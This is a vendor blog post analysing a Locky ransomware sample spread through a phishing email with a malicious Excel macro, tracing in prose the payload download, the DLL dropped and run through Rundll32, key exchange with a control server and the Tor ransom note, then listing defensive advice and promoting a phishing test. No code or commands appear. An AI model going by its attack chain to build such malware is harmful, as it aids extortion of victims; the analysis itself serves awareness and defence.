The ransomware risks in office files

Free phishing test
Posted by: Orhan Sari Category: Cyber-security Awareness, Information Security, Malware Tags: , , Post Date: November 2, 2017

The ransomware risks in office files

Free phishing test: Keep your employees aware of the Ransomware threats

Ransomware has become a nightmare for individuals and institutions for the last 2 years, previously found in September of 2013.  It is a dangerous kind of trojan horse in the ransom category. Initially bound to Microsoft Windows operating systems, ransomware has also been implemented for Android devices and Mac computers in the meantime. Moreover, as a new way of attack, we see ransomware in office files.

Ransomware is basically transmitted by e-mail attachments, subsequently encrypts some of the file genres inside of disks that are in the network. After, a user is told that encrypted files wouldn’t be decrypted without paying the ransom. In other words, it renders a cryptovirology attack that adversely affects the files, and postulate a ransom (payment) to reinstate it. In some sorts, when the ransom isn’t paid in the given time, it threatens that encrypted files wouldn’t be decrypted/restored.

Ransomware in Office Files

Ransomware commonly sprawled throughout the e-mails that contain fake electronic invoices. However, it should be kept in mind that attackers continue to develop new methods to infect the virus. In recent weeks, as a new way of infections, we see macros in Office files.

Why Macro?

The office files are used by account experts and information processors in the business world to formulate and automatize duties frequently applied. In the auspices of macros, because it is possible to run the code and instruction, the attackers typically use these means.  The malicious codes (harmful macros) kept in either MS excel or word and similar files could be employed to infect with spyware to encrypt data and in return demand a ransom to pay.

The inadequacy of Cyber Security Technology

The practically known antivirus softwares and sandbox solutions are to a large extent get nowhere against new generation ransomwares. The biggest reason for this situation is that the new generation ransomwares have the capability to constantly change their digital signature cannot be recognised with signature-based and static analyses.

Malicious software developers, malicious attackers can circumvent intuitive and behaviour-based automated analysis mechanisms with methods they have developed. In some cases, we see that these technologies can be late in discovering new malicious softwares.

Free phishing test: Keep your employees aware of the Ransomware threats 

An example of Ransomware

We share the analysis of an email in our inbox in the following example:

In a title that you never expect or an individual, you never expect from, you can receive an e-mail that you believe is in your interest. Such a malicious e-mail may seem (imitate) to be coming from an acquaintance or source that you expect! We begin our analysis with an e-mail trick by reminding that it is possible to send an e-mail on someone’s behalf.

Picture – 1 “An e-mail sample of attached malicious Excel file”

An example of a Malicious Software Analysis.

In general, a malware known as “Locky Ransomware” as it can be seen in Picture – 0, is sent by email to the victim. When victim downloads the Excel file from an e-mail and runs it, the macros in the Excel file becomes active and malware begins to work through macros.

In this example, it draws our attention that to make the file name convincing, when the file name is selected, a corporate name is entitled. Same as in the previous ransomware bill virus examples we have seen that the bill names are carefully selected to enhance its credibility.

Picture- 2 “ To make the file name convincing, It has templates used in corporate environments.”

When we analyze the macro (ransomware in office files) in picture -2, first it starts processing by downloading the encrypted payload to the computer via an Internet server.

Picture – 3 “Download address of the malicious code fragments”

Functionality of Macro

Due to the functionality of macro, Office files in Excel or in Word format had already turned into the most effective source of abuse used in cyber-attacks. Thus ransomware in office file (s) are one of the significant threats. When we examine ransomware in office files (macros in malicious Excel files) it attracts our attention that the encrypted content decrypted and run by downloading from the Internet.

Malicious software developer didn’t use code obfuscation for this case. As you can see in Picture – 2, part of this code is downloading malware stage which encrypts your data from then runs it. The person writes malicious macro code, downloads a piece of code to encrypt files on a victim’s computer and then runs by decrypting it.

Picture – 4 “Lucky macro at first downloads the piece of code in encrypted form.”

Downloaded malicious content is named as siluans.dll  after being resolved in the DLL file format to the %USERPROFILE%\temp  folder.  We see that it is a standard method that ransomware malware uses and with this injection method the encryption process initiated in pictures 4 and 5.

Free phishing test: Keep your employees aware of the Ransomware threats 

Picture-5 “ Injection method”

Picture – 6 “DLL Injection Method”

Malicious Macro Code in Excel file Passes into another Phase

We see that malicious macro code those are contained in an Excel file (ransomware in office files) passes into another phase in Picture – 6. With DLL file’s macro assistance which is required for Locky Ransomware, by using Rundll32.exe file qwerty function is being called.

Picture – 7 “Rundll32.exe qwerty function”

When we analyze Siluans.dll file, its command control server for accessing encryption keys and File I / O activity performed during encryption process might be seen in the following Pictures as well as in the Pictures 7, 8, and 9.

Picture – 8 “Key access”

Picture- 9 “Encrypted files are written back to disk with a singular sequence number and odin attachment”

We see that the person who has made up the malware is using the singular sequence number, that is to say, with per file charge alternative, improves the restoring functions.

Picture- 10 “A plain-text channel is preferred for encripton key”

 In Picture-10 we see that a plain-text channel is preferred for encryption key. In short, we can say that it does not need an additional layer of security for the encryption key.

  Picture- 11 “The standart welcome screen is seen after encryption process”

  Picture- 11 “The standard welcome screen is seen after the encryption process”

In Picture-11 the welcome screen is seen after the encryption process has been completed. We determined how Ransomware malware act with the macro in Excel file, how the piece of code is required for encryption from a server on the Internet and how Master Key is sent to the server by delivering a message to the victim after encryption is completed, and as always, how it demands a ransom.
Picture- 12 “We can only solve our encrypted files via a channel established with tor browsers path.”

Picture- 12 “We can only solve our encrypted files via a channel established with tor browsers path.”

As it is seen in the content of the message, in order to decrypt, the attacker lists ransom payment routines under the Tor network. 

Solution Proposals against Ransomware in Office Files

In short, as the result of the analysis of the ransomware in office files, we offer both individual and institutional solutions to your attention.

Individual solutions

  • We recommend you to tense up your antispam or antivirus protection, taking into account that these attacks are mainly carried out via e-mail or similar attacks.
  • Use intuitive Logger in your personal computer
  • Neutralize the macros for Office files that you do not trust the source
  • Do not open attachments from people you do not know!
  • Be in a similar approach against suspicious invoice or cargo headed emails.

 Institutional solutions

  • Intensify your antispam gateway solution and apply it against known ransomware threats.
  • Measure your employees against these phishing attacks and similar tests, then give some training for specific individuals and groups.
  • Ransomware domain intelligence is a healthy solution to prevent the risk. Incontrovertibly take advantage of similar services.

Can be found in PDF format from Slideshare account.

Register and measure your company’s risk against cyber attacks for free on Keepnetlabs.

Free phishing test: Keep your employees aware of the Ransomware threats 


Share this post